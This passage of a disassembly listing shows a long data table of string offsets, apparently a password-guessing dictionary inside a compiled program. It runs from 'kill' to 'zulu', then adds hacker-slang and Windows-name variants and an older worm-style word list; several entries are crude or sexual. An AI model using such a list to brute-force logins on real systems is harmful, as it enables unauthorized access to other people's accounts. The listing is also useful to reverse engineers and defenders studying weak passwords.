dd offset aKill ; "kill"
dd offset aKillthem ; "killthem"
dd offset aKilo ; "kilo"
dd offset aKimberly ; "kimberly"
dd offset aKing ; "king"
dd offset aKirk ; "kirk"
dd offset aKirkland ; "kirkland"
dd offset aKiss ; "kiss"
dd offset aKissmyas ; "kissmyas"
dd offset aKitten ; "kitten"
dd offset aKlingon ; "klingon"
dd offset aKnife ; "knife"
dd offset aKnight ; "knight"
dd offset aKnightma ; "knightma"
dd offset aKnown ; "known"
dd offset aKrista ; "krista"
dd offset aKristen ; "kristen"
dd offset aKristi ; "kristi"
dd offset aKristie ; "kristie"
dd offset aKristin ; "kristin"
dd offset aKristine ; "kristine"
dd offset aKristy ; "kristy"
dd offset aLadies ; "ladies"
dd offset aLadle ; "ladle"
dd offset aLakers ; "lakers"
dd offset aLambda ; "lambda"
dd offset aLaminati ; "laminati"
dd offset aLana ; "lana"
dd offset aLaptop ; "laptop"
dd offset aLara ; "lara"
dd offset aLarkin ; "larkin"
dd offset aLarry ; "larry"
dd offset aLaser ; "laser"
dd offset aLaura ; "laura"
dd offset aLava ; "lava"
dd offset aLazarus ; "lazarus"
dd offset aLazer ; "lazer"
dd offset aLeah ; "leah"
dd offset aLebesgue ; "lebesgue"
dd offset aLeft ; "left"
dd offset aLeftwing ; "leftwing"
dd offset aLegal ; "legal"
dd offset aLeland ; "leland"
dd offset aLeroy ; "leroy"
dd offset aLesbian ; "lesbian"
dd offset aLeslie ; "leslie"
dd offset aLetmein ; "letmein"
dd offset aLewis ; "lewis"
dd offset aLexluthe ; "lexluthe"
dd offset aLiberal ; "liberal"
dd offset aLibrary ; "library"
dd offset aLick ; "lick"
dd offset aLicker ; "licker"
dd offset aLife ; "life"
dd offset aLight ; "light"
dd offset aLightsab ; "lightsab"
dd offset aLima ; "lima"
dd offset aLimbaugh ; "limbaugh"
dd offset aLimited ; "limited"
dd offset aLinda ; "linda"
dd offset aLink ; "link"
dd offset aLion ; "lion"
dd offset aLips ; "lips"
dd offset aLisa ; "lisa"
dd offset aLisp ; "lisp"
dd offset aLiteratu ; "literatu"
dd offset aLive ; "live"
dd offset aLoad ; "load"
dd offset aLock ; "lock"
dd offset aLockout ; "lockout"
dd offset aLockword ; "lockword"
dd offset aLogic ; "logic"
dd offset aLoginwor ; "loginwor"
dd offset aLogout ; "logout"
dd offset aLois ; "lois"
dd offset aLolopc ; "lolopc"
dd offset aLoose ; "loose"
dd offset aLore ; "lore"
dd offset aLori ; "lori"
dd offset aLorin ; "lorin"
dd offset aLorraine ; "lorraine"
dd offset aLoser ; "loser"
dd offset aLouis ; "louis"
dd offset aLovebug ; "lovebug"
dd offset aLover ; "lover"
dd offset aLuck ; "luck"
dd offset aLucus ; "lucus"
dd offset aLucy ; "lucy"
dd offset aLude ; "lude"
dd offset aLuke ; "luke"
dd offset aLust ; "lust"
dd offset aLynn ; "lynn"
dd offset aLynne ; "lynne"
dd offset aMachine ; "machine"
dd offset aMacintos ; "macintos"
dd offset aMack ; "mack"
dd offset aMacro ; "macro"
dd offset aMaggot ; "maggot"
dd offset aMagic ; "magic"
dd offset aMagnet ; "magnet"
dd offset aMail ; "mail"
dd offset aMaint ; "maint"
dd offset aMalcolm ; "malcolm"
dd offset aMalcom ; "malcom"
dd offset aMana ; "mana"
dd offset aManager ; "manager"
dd offset aMara ; "mara"
dd offset aMarci ; "marci"
dd offset aMarcy ; "marcy"
dd offset aMaria ; "maria"
dd offset aMariens ; "mariens"
dd offset aMarietta ; "marietta"
dd offset aMarijuan ; "marijuan"
dd offset aMarines ; "marines"
dd offset aMark ; "mark"
dd offset aMarkus ; "markus"
dd offset aMarni ; "marni"
dd offset aMarriage ; "marriage"
dd offset aMars ; "mars"
dd offset aMarty ; "marty"
dd offset aMarvin ; "marvin"
dd offset aMary ; "mary"
dd offset aMason ; "mason"
dd offset aMaster ; "master"
dd offset aMath ; "math"
dd offset aMaurice ; "maurice"
dd offset aMeagan ; "meagan"
dd offset aMegabyte ; "megabyte"
dd offset aMegadeth ; "megadeth"
dd offset aMegan ; "megan"
dd offset aMelissa ; "melissa"
dd offset aMellon ; "mellon"
dd offset aMelrose ; "melrose"
dd offset aMember ; "member"
dd offset aMemory ; "memory"
dd offset aMenace ; "menace"
dd offset aMenu ; "menu"
dd offset aMercury ; "mercury"
dd offset aMerlin ; "merlin"
dd offset aMetal ; "metal"
dd offset aMetalhea ; "metalhea"
dd offset aMetalica ; "metalica"
dd offset aMets ; "mets"
dd offset aMice ; "mice"
dd offset aMichael ; "michael"
dd offset aMichel ; "michel"
dd offset aMichelan ; "michelan"
dd offset aMichele ; "michele"
dd offset aMichelle ; "michelle"
dd offset aMickey ; "mickey"
dd offset aMicro ; "micro"
dd offset aMicrochi ; "microchi"
dd offset aMicropro ; "micropro"
dd offset aMicrosof ; "microsof"
dd offset aMidieval ; "midieval"
dd offset aMike ; "mike"
dd offset aMine ; "mine"
dd offset aMinimum ; "minimum"
dd offset aMinsky ; "minsky"
dd offset aMisfit ; "misfit"
dd offset aMission ; "mission"
dd offset aMkii ; "mkii"
dd offset aMode ; "mode"
dd offset aModem ; "modem"
dd offset aMogul ; "mogul"
dd offset aMoguls ; "moguls"
dd offset aMonday ; "monday"
dd offset aMonica ; "monica"
dd offset aMoom ; "moom"
dd offset aMoor ; "moor"
dd offset aMoose ; "moose"
dd offset aMore ; "more"
dd offset aMorley ; "morley"
dd offset aMorris ; "morris"
dd offset aMortal ; "mortal"
dd offset aMortalco ; "mortalco"
dd offset aMortgage ; "mortgage"
dd offset aMosaic ; "mosaic"
dd offset aMountain ; "mountain"
dd offset aMouse ; "mouse"
dd offset aMove ; "move"
dd offset aMovie ; "movie"
dd offset aMovies ; "movies"
dd offset aMozart ; "mozart"
dd offset aMpeg ; "mpeg"
dd offset aMsdos ; "msdos"
dd offset aMuppets ; "muppets"
dd offset aMutant ; "mutant"
dd offset aNagel ; "nagel"
dd offset aName ; "name"
dd offset aNancy ; "nancy"
dd offset aNapoleon ; "napoleon"
dd offset aNasa ; "nasa"
dd offset aNavy ; "navy"
dd offset aNepenthe ; "nepenthe"
dd offset aNeptune ; "neptune"
dd offset aNess ; "ness"
dd offset aNetscape ; "netscape"
dd offset aNetwork_0 ; "network"
dd offset aNewborn ; "newborn"
dd offset aNews ; "news"
dd offset aNewsgrou ; "newsgrou"
dd offset aNewton ; "newton"
dd offset aNewyork ; "newyork"
dd offset aNext ; "next"
dd offset aNice ; "nice"
dd offset aNicole ; "nicole"
dd offset aNicotine ; "nicotine"
dd offset aNight ; "night"
dd offset aNightmar ; "nightmar"
dd offset aNintendo ; "nintendo"
dd offset aNita ; "nita"
dd offset aNnaacp ; "nnaacp"
dd offset aNoble ; "noble"
dd offset aNobody ; "nobody"
dd offset aNode ; "node"
dd offset aNoreen ; "noreen"
dd offset aNotes ; "notes"
dd offset aNoth ; "noth"
dd offset aNova ; "nova"
dd offset aNovel ; "novel"
dd offset aNovember ; "november"
dd offset aNoxious ; "noxious"
dd offset aNuclear ; "nuclear"
dd offset aNude ; "nude"
dd offset aNuke ; "nuke"
dd offset aNukem ; "nukem"
dd offset aNull_1 ; "null"
dd offset aNumber ; "number"
dd offset aNutritio ; "nutritio"
dd offset aNuts ; "nuts"
dd offset aNyquist ; "nyquist"
dd offset aObscurit ; "obscurit"
dd offset aOceanogr ; "oceanogr"
dd offset aOcelot ; "ocelot"
dd offset aOffice ; "office"
dd offset aOkay ; "okay"
dd offset aOldage ; "oldage"
dd offset aOlivetti ; "olivetti"
dd offset aOlivia ; "olivia"
dd offset aOmega ; "omega"
dd offset aOpen ; "open"
dd offset aOpening ; "opening"
dd offset aOpenlock ; "openlock"
dd offset aOpensesa ; "opensesa"
dd offset aOperator ; "operator"
dd offset aOrca ; "orca"
dd offset aOrient ; "orient"
dd offset aOrwell ; "orwell"
dd offset aOscar ; "oscar"
dd offset aOsiris ; "osiris"
dd offset aOutdoors ; "outdoors"
dd offset aOutlaw ; "outlaw"
dd offset aOutput ; "output"
dd offset aOutside ; "outside"
dd offset aOxford ; "oxford"
dd offset aPacific ; "pacific"
dd offset aPackard ; "packard"
dd offset aPacker ; "packer"
dd offset aPainless ; "painless"
dd offset aPaint ; "paint"
dd offset aPakistan ; "pakistan"
dd offset aPamela ; "pamela"
dd offset aPapa ; "papa"
dd offset aPaper ; "paper"
dd offset aPapers ; "papers"
dd offset aPascal ; "pascal"
dd offset aPassphra ; "passphra"
dd offset aPaste ; "paste"
dd offset aPatricia ; "patricia"
dd offset aPatriot ; "patriot"
dd offset aPatty ; "patty"
dd offset aPaula ; "paula"
dd offset aPeanuts ; "peanuts"
dd offset aPecker ; "pecker"
dd offset aPencil ; "pencil"
dd offset aPenelope ; "penelope"
dd offset aPenguin ; "penguin"
dd offset aPenis ; "penis"
dd offset aPenname ; "penname"
dd offset aPentagon ; "pentagon"
dd offset aPentagra ; "pentagra"
dd offset aPenthous ; "penthous"
dd offset aPentium ; "pentium"
dd offset aPeoria ; "peoria"
dd offset aPepper ; "pepper"
dd offset aPercolat ; "percolat"
dd offset aPerfect ; "perfect"
dd offset aPermit ; "permit"
dd offset aPersimmo ; "persimmo"
dd offset aPersona ; "persona"
dd offset aPervert ; "pervert"
dd offset aPete ; "pete"
dd offset aPeter ; "peter"
dd offset aPhil ; "phil"
dd offset aPhilip ; "philip"
dd offset aPhoenix ; "phoenix"
dd offset aPhone ; "phone"
dd offset aPhoton ; "photon"
dd offset aPhrack ; "phrack"
dd offset aPhrase ; "phrase"
dd offset aPhreak ; "phreak"
dd offset aPhuck ; "phuck"
dd offset aPick ; "pick"
dd offset aPierre ; "pierre"
dd offset aPimp ; "pimp"
dd offset aPinname ; "pinname"
dd offset aPiss ; "piss"
dd offset aPizza ; "pizza"
dd offset aPlane ; "plane"
dd offset aPlayboy ; "playboy"
dd offset aPlover ; "plover"
dd offset aPluto ; "pluto"
dd offset aPlymouth ; "plymouth"
dd offset aPoetry ; "poetry"
dd offset aPolice ; "police"
dd offset aPolly ; "polly"
dd offset aPolynomi ; "polynomi"
dd offset aPonderin ; "ponderin"
dd offset aPoop ; "poop"
dd offset aPoor ; "poor"
dd offset aPork ; "pork"
dd offset aPorn ; "porn"
dd offset aPorno ; "porno"
dd offset aPorsche ; "porsche"
dd offset aPost ; "post"
dd offset aPoster ; "poster"
dd offset aPower ; "power"
dd offset aPraise ; "praise"
dd offset aPrecious ; "precious"
dd offset aPrelude ; "prelude"
dd offset aPresto ; "presto"
dd offset aPrince ; "prince"
dd offset aPrinceto ; "princeto"
dd offset aPrinter ; "printer"
dd offset aPriv ; "priv"
dd offset aPrivate ; "private"
dd offset aPrivs ; "privs"
dd offset aProceed ; "proceed"
dd offset aProcesso ; "processo"
dd offset aProfesso ; "professo"
dd offset aProfile ; "profile"
dd offset aProgram ; "program"
dd offset aPrompt ; "prompt"
dd offset aProtect ; "protect"
dd offset aProtozoa ; "protozoa"
dd offset aPsycho ; "psycho"
dd offset aPsychopa ; "psychopa"
dd offset aPublic ; "public"
dd offset aPuck ; "puck"
dd offset aPuke ; "puke"
dd offset aPumpkin ; "pumpkin"
dd offset aPuneet ; "puneet"
dd offset aPunisher ; "punisher"
dd offset aPunk ; "punk"
dd offset aPuppet ; "puppet"
dd offset aPussy ; "pussy"
dd offset aQuebec ; "quebec"
dd offset aQwert ; "qwert"
dd offset aQwerty ; "qwerty"
dd offset aRabbit ; "rabbit"
dd offset aRachel ; "rachel"
dd offset aRachelle ; "rachelle"
dd offset aRachmani ; "rachmani"
dd offset aRaid ; "raid"
dd offset aRain ; "rain"
dd offset aRainbow ; "rainbow"
dd offset aRaindrop ; "raindrop"
dd offset aRaleigh ; "raleigh"
dd offset aRandom ; "random"
dd offset aRape ; "rape"
dd offset aRascal ; "rascal"
dd offset aRazor ; "razor"
dd offset aReagan ; "reagan"
dd offset aReality ; "reality"
dd offset aReally ; "really"
dd offset aReam ; "ream"
dd offset aReaper ; "reaper"
dd offset aRebal ; "rebal"
dd offset aRebecca ; "rebecca"
dd offset aRebel ; "rebel"
dd offset aRecord ; "record"
dd offset aReddawn ; "reddawn"
dd offset aRedhead ; "redhead"
dd offset aReferenc ; "referenc"
dd offset aRegional ; "regional"
dd offset aRelease ; "release"
dd offset aRemote ; "remote"
dd offset aRenee ; "renee"
dd offset aReno ; "reno"
dd offset aRent ; "rent"
dd offset aReport ; "report"
dd offset aRepublic ; "republic"
dd offset aResistan ; "resistan"
dd offset aReveal ; "reveal"
dd offset aRhino ; "rhino"
dd offset aRich ; "rich"
dd offset aRick ; "rick"
dd offset aRiffraff ; "riffraff"
dd offset aRight ; "right"
dd offset aRightwin ; "rightwin"
dd offset aRing ; "ring"
dd offset aRiot ; "riot"
dd offset aRipple ; "ripple"
dd offset aRisc ; "risc"
dd offset aRoach ; "roach"
dd offset aRobert ; "robert"
dd offset aRobin ; "robin"
dd offset aRobot ; "robot"
dd offset aRobotics ; "robotics"
dd offset aRobyn ; "robyn"
dd offset aRochelle ; "rochelle"
dd offset aRocheste ; "rocheste"
dd offset aRock ; "rock"
dd offset aRocky ; "rocky"
dd offset aRockyhor ; "rockyhor"
dd offset aRodent ; "rodent"
dd offset aRolex ; "rolex"
dd offset aRomano ; "romano"
dd offset aRomeo ; "romeo"
dd offset aRomulan ; "romulan"
dd offset aRonald ; "ronald"
dd offset aRose ; "rose"
dd offset aRosebud ; "rosebud"
dd offset aRosemary ; "rosemary"
dd offset aRoses ; "roses"
dd offset aRough ; "rough"
dd offset aRubber ; "rubber"
dd offset aRuben ; "ruben"
dd offset aRuby ; "ruby"
dd offset aRude ; "rude"
dd offset aRules ; "rules"
dd offset aRunning_0 ; "running"
dd offset aRush ; "rush"
dd offset aRuth ; "ruth"
dd offset aSafe ; "safe"
dd offset aSalami ; "salami"
dd offset aSale ; "sale"
dd offset aSalt ; "salt"
dd offset aSamantha ; "samantha"
dd offset aSample ; "sample"
dd offset aSandra ; "sandra"
dd offset aSandy ; "sandy"
dd offset aSara ; "sara"
dd offset aSarah ; "sarah"
dd offset aSaturday ; "saturday"
dd offset aSaturn ; "saturn"
dd offset aSaxon ; "saxon"
dd offset aScamper ; "scamper"
dd offset aScheme ; "scheme"
dd offset aSchool ; "school"
dd offset aSchoolsucks ; "schoolsucks"
dd offset aScifi ; "scifi"
dd offset aScorpion ; "scorpion"
dd offset aScott ; "scott"
dd offset aScotty ; "scotty"
dd offset aScout ; "scout"
dd offset aSearch ; "search"
dd offset aSecurity ; "security"
dd offset aSeed ; "seed"
dd offset aSega ; "sega"
dd offset aSensor ; "sensor"
dd offset aSentinel ; "sentinel"
dd offset aSentry ; "sentry"
dd offset aSerenity ; "serenity"
dd offset aSerial_0 ; "serial"
dd offset aService ; "service"
dd offset aSesame ; "sesame"
dd offset aSexy ; "sexy"
dd offset aShannon ; "shannon"
dd offset aSharc ; "sharc"
dd offset aShark ; "shark"
dd offset aSharks ; "sharks"
dd offset aSharon ; "sharon"
dd offset aSheffiel ; "sheffiel"
dd offset aSheldon ; "sheldon"
dd offset aShell ; "shell"
dd offset aSherri ; "sherri"
dd offset aShift ; "shift"
dd offset aShirley ; "shirley"
dd offset aShit ; "shit"
dd offset aShitpot ; "shitpot"
dd offset aShiva ; "shiva"
dd offset aShivers ; "shivers"
dd offset aShort ; "short"
dd offset aShuttle ; "shuttle"
dd offset aSick ; "sick"
dd offset aSierra ; "sierra"
dd offset aSignatur ; "signatur"
dd offset aSilver ; "silver"
dd offset aSimcity ; "simcity"
dd offset aSimon ; "simon"
dd offset aSimple ; "simple"
dd offset aSimpsons ; "simpsons"
dd offset aSimulati ; "simulati"
dd offset aSinger ; "singer"
dd offset aSingle ; "single"
dd offset aSite ; "site"
dd offset aSkull ; "skull"
dd offset aSlave ; "slave"
dd offset aSlick ; "slick"
dd offset aSliders ; "sliders"
dd offset aSlow ; "slow"
dd offset aSlut ; "slut"
dd offset aSmall ; "small"
dd offset aSmart ; "smart"
dd offset aSmile ; "smile"
dd offset aSmiles ; "smiles"
dd offset aSmooch ; "smooch"
dd offset aSmother ; "smother"
dd offset aSmtp ; "smtp"
dd offset aSmut ; "smut"
dd offset aSnach ; "snach"
dd offset aSnafu ; "snafu"
dd offset aSnake ; "snake"
dd offset aSnatch ; "snatch"
dd offset aSnoopy ; "snoopy"
dd offset aSoap ; "soap"
dd offset aSocial ; "social"
dd offset aSocrates ; "socrates"
dd offset aSodomy ; "sodomy"
dd offset aSoft ; "soft"
dd offset aSoftware ; "software"
dd offset aSomebody ; "somebody"
dd offset aSondra ; "sondra"
dd offset aSonia ; "sonia"
dd offset aSonic ; "sonic"
dd offset aSonya ; "sonya"
dd offset aSossina ; "sossina"
dd offset aSource ; "source"
dd offset aSouth ; "south"
dd offset aSpaceshi ; "spaceshi"
dd offset aSparrows ; "sparrows"
dd offset aSpear ; "spear"
dd offset aSpell ; "spell"
dd offset aSpice ; "spice"
dd offset aSpider ; "spider"
dd offset aSpiderma ; "spiderma"
dd offset aSpit ; "spit"
dd offset aSpred ; "spred"
dd offset aSpring ; "spring"
dd offset aSpringer ; "springer"
dd offset aSpunk ; "spunk"
dd offset aSquires ; "squires"
dd offset aSr71 ; "sr71"
dd offset aStacey ; "stacey"
dd offset aStaci ; "staci"
dd offset aStacie ; "stacie"
dd offset aStacy ; "stacy"
dd offset aStar ; "star"
dd offset aStarship ; "starship"
dd offset aStart ; "start"
dd offset aStartrek ; "startrek"
dd offset aStartup ; "startup"
dd offset aStarwars ; "starwars"
dd offset aSteak ; "steak"
dd offset aSteal ; "steal"
dd offset aSteel ; "steel"
dd offset aSteph ; "steph"
dd offset aStephani ; "stephani"
dd offset aStereo ; "stereo"
dd offset aSteve ; "steve"
dd offset aStoneage ; "stoneage"
dd offset aStoned ; "stoned"
dd offset aStones ; "stones"
dd offset aStrange ; "strange"
dd offset aStrangle ; "strangle"
dd offset aStratfor ; "stratfor"
dd offset aStreetfi ; "streetfi"
dd offset aString ; "string"
dd offset aStrip ; "strip"
dd offset aStudent ; "student"
dd offset aStuttgar ; "stuttgar"
dd offset aSubscrib ; "subscrib"
dd offset aSubway ; "subway"
dd offset aSuccess ; "success"
dd offset aSuck ; "suck"
dd offset aSuckmydi ; "suckmydi"
dd offset aSucks ; "sucks"
dd offset aSummer ; "summer"
dd offset aSunday ; "sunday"
dd offset aSuperman ; "superman"
dd offset aSuperson ; "superson"
dd offset aSupersta ; "supersta"
dd offset aSuperuse ; "superuse"
dd offset aSupervis ; "supervis"
dd offset aSupport ; "support"
dd offset aSupporte ; "supporte"
dd offset aSurfer ; "surfer"
dd offset aSurfing ; "surfing"
dd offset aSusan ; "susan"
dd offset aSusanne ; "susanne"
dd offset aSusie ; "susie"
dd offset aSuzanne ; "suzanne"
dd offset aSuzie ; "suzie"
dd offset aSwearer ; "swearer"
dd offset aSweat ; "sweat"
dd offset aSwitch ; "switch"
dd offset aSword ; "sword"
dd offset aSybil ; "sybil"
dd offset aSymmetry ; "symmetry"
dd offset aSysadmin ; "sysadmin"
dd offset aSysop ; "sysop"
dd offset aTabasco ; "tabasco"
dd offset aTalk ; "talk"
dd offset aTall ; "tall"
dd offset aTamara ; "tamara"
dd offset aTami ; "tami"
dd offset aTamie ; "tamie"
dd offset aTammy ; "tammy"
dd offset aTangerin ; "tangerin"
dd offset aTango ; "tango"
dd offset aTape ; "tape"
dd offset aTara ; "tara"
dd offset aTarget ; "target"
dd offset aTarragon ; "tarragon"
dd offset aTaylor ; "taylor"
dd offset aTeacher ; "teacher"
dd offset aTeam ; "team"
dd offset aTeapot ; "teapot"
dd offset aTears ; "tears"
dd offset aTech ; "tech"
dd offset aTeen ; "teen"
dd offset aTeenage ; "teenage"
dd offset aTelephon ; "telephon"
dd offset aTelnet ; "telnet"
dd offset aTemptati ; "temptati"
dd offset aTennis ; "tennis"
dd offset aTera ; "tera"
dd offset aTerminal ; "terminal"
dd offset aTerminat ; "terminat"
dd offset aTess ; "tess"
dd offset aTetris ; "tetris"
dd offset aText ; "text"
dd offset aThailand ; "thailand"
dd offset aTheresa ; "theresa"
dd offset aThin ; "thin"
dd offset aThursday ; "thursday"
dd offset aTiffany ; "tiffany"
dd offset aTiger ; "tiger"
dd offset aTime ; "time"
dd offset aTina ; "tina"
dd offset aTits ; "tits"
dd offset aToad ; "toad"
dd offset aToggle ; "toggle"
dd offset aToken ; "token"
dd offset aTokenrin ; "tokenrin"
dd offset aTomato ; "tomato"
dd offset aTopograp ; "topograp"
dd offset aTortoise ; "tortoise"
dd offset aToxic ; "toxic"
dd offset aToyota ; "toyota"
dd offset aTraci ; "traci"
dd offset aTracie ; "tracie"
dd offset aTracy ; "tracy"
dd offset aTrails ; "trails"
dd offset aTransfer ; "transfer"
dd offset aTrap ; "trap"
dd offset aTrapdoor ; "trapdoor"
dd offset aTree ; "tree"
dd offset aTrek ; "trek"
dd offset aTrisha ; "trisha"
dd offset aTrivial ; "trivial"
dd offset aTrojan ; "trojan"
dd offset aTrombone ; "trombone"
dd offset aTron ; "tron"
dd offset aTrue ; "true"
dd offset aTruth ; "truth"
dd offset aTubas ; "tubas"
dd offset aTuesday ; "tuesday"
dd offset aTurn ; "turn"
dd offset aTuttle ; "tuttle"
dd offset aUgly ; "ugly"
dd offset aUmesh ; "umesh"
dd offset aUncle ; "uncle"
dd offset aUndo ; "undo"
dd offset aUnhappy ; "unhappy"
dd offset aUnicorn ; "unicorn"
dd offset aUniform ; "uniform"
dd offset aUniversa ; "universa"
dd offset aUniverse ; "universe"
dd offset aUniversi ; "universi"
dd offset aUnknown_2 ; "unknown"
dd offset aUnlock ; "unlock"
dd offset aUpload ; "upload"
dd offset aUranus ; "uranus"
dd offset aUrchin ; "urchin"
dd offset aUrsula ; "ursula"
dd offset aUsenet ; "usenet"
dd offset aUsermane ; "usermane"
dd offset aUsername_0 ; "username"
dd offset aUsmc ; "usmc"
dd offset aUtil ; "util"
dd offset aUtility ; "utility"
dd offset aUucp ; "uucp"
dd offset aVagina ; "vagina"
dd offset aValerie ; "valerie"
dd offset aVampire ; "vampire"
dd offset aVasant ; "vasant"
dd offset aVenus ; "venus"
dd offset aVeronica ; "veronica"
dd offset aVertigo ; "vertigo"
dd offset aVicky ; "vicky"
dd offset aVictor ; "victor"
dd offset aVideo ; "video"
dd offset aVideogam ; "videogam"
dd offset aVillage ; "village"
dd offset aVirgin ; "virgin"
dd offset aVirginia ; "virginia"
dd offset aVirus ; "virus"
dd offset aVisitor ; "visitor"
dd offset aVisual ; "visual"
dd offset aVisualba ; "visualba"
dd offset aVodka ; "vodka"
dd offset aWaco ; "waco"
dd offset aWard ; "ward"
dd offset aWarez ; "warez"
dd offset aWarfare ; "warfare"
dd offset aWargames ; "wargames"
dd offset aWarp ; "warp"
dd offset aWarren ; "warren"
dd offset aWasp ; "wasp"
dd offset aWatchwor ; "watchwor"
dd offset aWater ; "water"
dd offset aWave ; "wave"
dd offset aWebpage ; "webpage"
dd offset aWednesda ; "wednesda"
dd offset aWeed ; "weed"
dd offset aWeenie ; "weenie"
dd offset aWell ; "well"
dd offset aWendi ; "wendi"
dd offset aWendy ; "wendy"
dd offset aWerewolf ; "werewolf"
dd offset aWest ; "west"
dd offset aWestern ; "western"
dd offset aWhatever ; "whatever"
dd offset aWhatnot ; "whatnot"
dd offset aWhisky ; "whisky"
dd offset aWhite ; "white"
dd offset aWhiting ; "whiting"
dd offset aWhitney ; "whitney"
dd offset aWholesal ; "wholesal"
dd offset aWhore ; "whore"
dd offset aWill ; "will"
dd offset aWilliam ; "william"
dd offset aWilliams ; "williams"
dd offset aWillie ; "willie"
dd offset aWilma ; "wilma"
dd offset aWindows ; "windows"
dd offset aWine ; "wine"
dd offset aWing ; "wing"
dd offset aWinston ; "winston"
dd offset aWired ; "wired"
dd offset aWisconsi ; "wisconsi"
dd offset aWiseass ; "wiseass"
dd offset aWithin ; "within"
dd offset aWizard ; "wizard"
dd offset aWolf ; "wolf"
dd offset aWolverin ; "wolverin"
dd offset aWoman ; "woman"
dd offset aWombat ; "wombat"
dd offset aWomen ; "women"
dd offset aWood ; "wood"
dd offset aWoodwind ; "woodwind"
dd offset aWord ; "word"
dd offset aWordperf ; "wordperf"
dd offset aWorf ; "worf"
dd offset aWork ; "work"
dd offset aWorm ; "worm"
dd offset aWormwood ; "wormwood"
dd offset aWwii ; "wwii"
dd offset aWyoming ; "wyoming"
dd offset aXena ; "xena"
dd offset aXfer ; "xfer"
dd offset aXman ; "xman"
dd offset aXmen ; "xmen"
dd offset aXmodem ; "xmodem"
dd offset aXray ; "xray"
dd offset aXyzzy ; "xyzzy"
dd offset aYaco ; "yaco"
dd offset aYang ; "yang"
dd offset aYankee ; "yankee"
dd offset aYellow ; "yellow"
dd offset aYellowst ; "yellowst"
dd offset aYolanda ; "yolanda"
dd offset aYosemite ; "yosemite"
dd offset aYoung ; "young"
dd offset aZebra ; "zebra"
dd offset aZeitgeis ; "zeitgeis"
dd offset aZiggy ; "ziggy"
dd offset aZimmerma ; "zimmerma"
dd offset aZmodem ; "zmodem"
dd offset aZombie ; "zombie"
dd offset aZulu ; "zulu"
dd offset a00000000 ; "00000000"
dd offset aTester ; "tester"
dd offset aTestin ; "testin"
dd offset aRoss ; "Ross"
dd offset aRosco ; "Rosco"
dd offset aRoscop ; "RoscoP"
dd offset aRoscopcoltrane ; "RoscoPColtrane"
dd offset aLol ; "lol"
dd offset aD00d ; "d00d"
dd offset aDudette ; "dudette"
dd offset aDud3 ; "dud3"
dd offset aAl3x ; "Al3x"
dd offset aAlexander ; "Alexander"
dd offset aDonaldduck ; "donaldduck"
dd offset aWileecoyote ; "wileecoyote"
dd offset aWindowz ; "windowz"
dd offset aWindoze ; "windoze"
dd offset aWindose ; "windose"
dd offset aBilly ; "billy"
dd offset aM ; "M$"
dd offset aMs ; "MS"
dd offset aWindowsxp ; "WindowsXP"
dd offset aWindows2k ; "windows2k"
dd offset aWindowsme ; "windowsME"
dd offset aWindows98 ; "windows98"
dd offset aWindows95 ; "windows95"
dd offset aWindozexp ; "windozexp"
dd offset aWindoze2k ; "windoze2k"
dd offset aWindozeme ; "windozeME"
dd offset aWindoze98 ; "windoze98"
dd offset aWindoze95 ; "windoze95"
dd offset aWh0r3 ; "wh0r3"
dd offset aHo ; "ho"
dd offset aWh0re ; "wh0re"
dd offset aHax ; "hax"
dd offset aHaxing ; "haxing"
dd offset aH4x1ng ; "h4x1ng"
dd offset aH4x0r1ng ; "h4x0r1ng"
dd offset aH4x0ring ; "h4x0ring"
dd offset aAda ; "ada"
dd offset aAlbatross ; "albatross"
dd offset aAlf ; "alf"
dd offset aAma ; "ama"
dd offset aAmorphous ; "amorphous"
dd offset aAmy ; "amy"
dd offset aAndromache ; "andromache"
dd offset aAnn ; "ann"
dd offset aAnthropogenic ; "anthropogenic"
dd offset aAsd ; "asd"
dd offset aAsm ; "asm"
dd offset aAtmosphere ; "atmosphere"
dd offset aBeethoven ; "beethoven"
dd offset aBicameral ; "bicameral"
dd offset aBob ; "bob"
dd offset aBsd ; "bsd"
dd offset aCad ; "cad"
dd offset aCampanile ; "campanile"
dd offset aCat ; "cat"
dd offset aCatherine ; "catherine"
dd offset aChemistry ; "chemistry"
dd offset aChristina ; "christina"
dd offset aChristine ; "christine"
dd offset aCommrades ; "commrades"
dd offset aCornelius ; "cornelius"
dd offset aDeb ; "deb"
dd offset aDesperate ; "desperate"
dd offset aDiscovery ; "discovery"
dd offset aDog ; "dog"
dd offset aDos ; "dos"
dd offset aEdinburgh ; "edinburgh"
dd offset aEiderdown ; "eiderdown"
dd offset aElizabeth ; "elizabeth"
dd offset aEnterprise ; "enterprise"
dd offset aEstablish ; "establish"
dd offset aExtension ; "extension"
dd offset aFoolproof ; "foolproof"
dd offset aForesight ; "foresight"
dd offset aFun ; "fun"
dd offset aGnu ; "gnu"
dd offset aHal ; "hal"
dd offset aHappening ; "happening"
dd offset aIbm ; "ibm"
dd offset aImbroglio ; "imbroglio"
dd offset aInnocuous ; "innocuous"
dd offset aJen ; "jen"
dd offset aJoy ; "joy"
dd offset aKey ; "key"
dd offset aKim ; "kim"
dd offset aLamination ; "lamination"
dd offset aLee ; "lee"
dd offset aLiz ; "liz"
dd offset aMacintosh ; "macintosh"
dd offset aMgr ; "mgr"
dd offset aMit ; "mit"
dd offset aNet ; "net"
dd offset aNew ; "new"
dd offset aNutrition ; "nutrition"
dd offset aOceanography ; "oceanography"
dd offset aPad ; "pad"
dd offset aPam ; "pam"
dd offset aPercolate ; "percolate"
dd offset aPersimmon ; "persimmon"
dd offset aPolynomial ; "polynomial"
dd offset aPondering ; "pondering"
dd offset aPrinceton ; "princeton"
dd offset aProfessor ; "professor"
dd offset aPub ; "pub"
dd offset aRachmaninoff ; "rachmaninoff"
dd offset aRje ; "rje"
dd offset aRochester ; "rochester"
dd offset aSal ; "sal"
dd offset aSheffield ; "sheffield"
dd offset aSignature ; "signature"
dd offset aStephanie ; "stephanie"
dd offset aStratford ; "stratford"
dd offset aStuttgart ; "stuttgart"
dd offset aSun ; "sun"
dd offset aSuperstage ; "superstage"
dd offset aSuperuser ; "superuser"
dd offset aSupported ; "supported"
dd offset aSys ; "sys"
dd offset aTangerine ; "tangerine"
dd offset aTelephone ; "telephone"
dd offset aTemptation ; "temptation"
dd offset aTopography ; "topography"
dd offset aTty ; "tty"
dd offset aWholesale ; "wholesale"
dd offset aWilliamsburg ; "williamsburg"
dd offset aWisconsin ; "wisconsin"
dd offset aXyz ; "xyz"
dd offset aYellowstone ; "yellowstone"
dd offset aZap ; "zap"
dd offset aZimmerman ; "zimmerman"
dd offset byte_43C80C
dd 0
dword_4313B4 dd 10h ; DATA XREF: sub_40BE75+72�w
; sub_40EE72+B6E�r ...
